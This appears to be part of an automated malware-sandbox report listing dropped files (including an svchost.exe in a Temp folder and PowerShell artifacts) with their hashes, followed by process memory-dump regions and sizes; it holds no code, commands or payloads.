2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize
409KB

MD5
61e7a9eaef04c1617ffff35c0287d234

SHA1
5a6ffedd75ac4e07594ccb6974ee8684d5128a35

SHA256
b2b4be7ae20431c88115d561a6886f22ab3416595338e7e2eb361f0bb428b987

SHA512
8ee9fd8d8631dd611ff539fc35ad4c26f7bfb4b8a26de12e03f48f3b87a7f18198c37ec187a1e8393aafb88e468e74c734cafcaf72f73b0afc55822762d767e6

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_y4z5e25b.fwl.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bb7d9cd87343b2c81c21c7b27e6ab694

SHA1
27475110d09f1fc948f1d5ecf3e41aba752401fd

SHA256
b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df

SHA512
bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b

Download Submit
memory/396-55-0x0000000006E80000-0x0000000006E8A000-memory.dmp

Filesize
40KB

Download
memory/420-105-0x000001D989000000-0x000001D98902B000-memory.dmp

Filesize
172KB

Download
memory/420-112-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp

Filesize
64KB

Download
memory/420-111-0x000001D989000000-0x000001D98902B000-memory.dmp

Filesize
172KB

Download
memory/456-116-0x00000194FEF70000-0x00000194FEF9B000-memory.dmp

Filesize
172KB

Download
memory/640-70-0x000002331C250000-0x000002331C275000-memory.dmp

Filesize
148KB

Download
memory/640-71-0x000002331C280000-0x000002331C2AB000-memory.dmp

Filesize
172KB

Download
memory/640-72-0x000002331C280000-0x000002331C2AB000-memory.dmp

Filesize
172KB

Download
memory/640-79-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp

Filesize
64KB

Download
memory/640-78-0x000002331C280000-0x000002331C2AB000-memory.dmp

Filesize
172KB

Download
memory/708-83-0x0000024CE3800000-0x0000024CE382B000-memory.dmp

Filesize
172KB

Download
memory/708-90-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp

Filesize
64KB

Download
memory/708-89-0x0000024CE3800000-0x0000024CE382B000-memory.dmp

Filesize
172KB

Download
memory/996-94-0x0000023CC8DA0000-0x0000023CC8DCB000-memory.dmp

Filesize
172KB

Download
memory/996-100-0x0000023CC8DA0000-0x0000023CC8DCB000-memory.dmp

Filesize
172KB

Download
memory/996-101-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp

Filesize
64KB

Download
memory/1368-0-0x00007FF84CE13000-0x00007FF84CE15000-memory.dmp

Filesize
8KB

Download
memory/1368-723-0x00007FF84CE10000-0x00007FF84D8D2000-memory.dmp

Filesize
10.8MB

Download
memory/1368-24-0x00007FF84CE10000-0x00007FF84D8D2000-memory.dmp

Filesize
10.8MB

Download
memory/1368-1-0x0000000000ED0000-0x0000000000F28000-memory.dmp

Filesize
352KB

Download
memory/1612-56-0x0000014ED4E20000-0x0000014ED4E4A000-memory.dmp

Filesize
168KB

Download
memory/1612-57-0x00007FF86DC60000-0x00007FF86DE69000-memory.dmp

Filesize
2.0MB

Download
memory/1612-48-0x0000014ED4DC0000-0x0000014ED4DE2000-memory.dmp

Filesize
136KB

Download
memory/1612-58-0x00007FF86CC60000-0x00007FF86CD1D000-memory.dmp

Filesize
756KB

Download
memory/2356-65-0x00007FF86DC60000-0x00007FF86DE69000-memory.dmp

Filesize
2.0MB

Download
memory/2356-67-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2356-61-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2356-64-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2356-66-0x00007FF86CC60000-0x00007FF86CD1D000-memory.dmp

Filesize
756KB

Download
memory/2356-62-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2356-59-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2356-60-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3604-34-0x00000000066C0000-0x00000000066D2000-memory.dmp

Filesize
72KB

Download
memory/3604-35-0x0000000006B10000-0x0000000006B4C000-memory.dmp

Filesize
240KB

Download
memory/3604-33-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/3604-30-0x00000000058A0000-0x0000000005932000-memory.dmp

Filesize
584KB

Download
memory/3604-28-0x0000000005DB0000-0x0000000006356000-memory.dmp

Filesize
5.6MB

Download
memory/3604-26-0x0000000000750000-0x00000000007BC000-memory.dmp

Filesize
432KB

Download
memory/3604-25-0x00000000744BE000-0x00000000744BF000-memory.dmp

Filesize
4KB

Download
memory/4492-32-0x00000000744B0000-0x0000000074C61000-memory.dmp

Filesize
7.7MB

Download
memory/4492-31-0x00000000744B0000-0x0000000074C61000-memory.dmp

Filesize
7.7MB

Download
memory/4492-29-0x0000000000090000-0x00000000000B0000-memory.dmp

Filesize
128KB

Download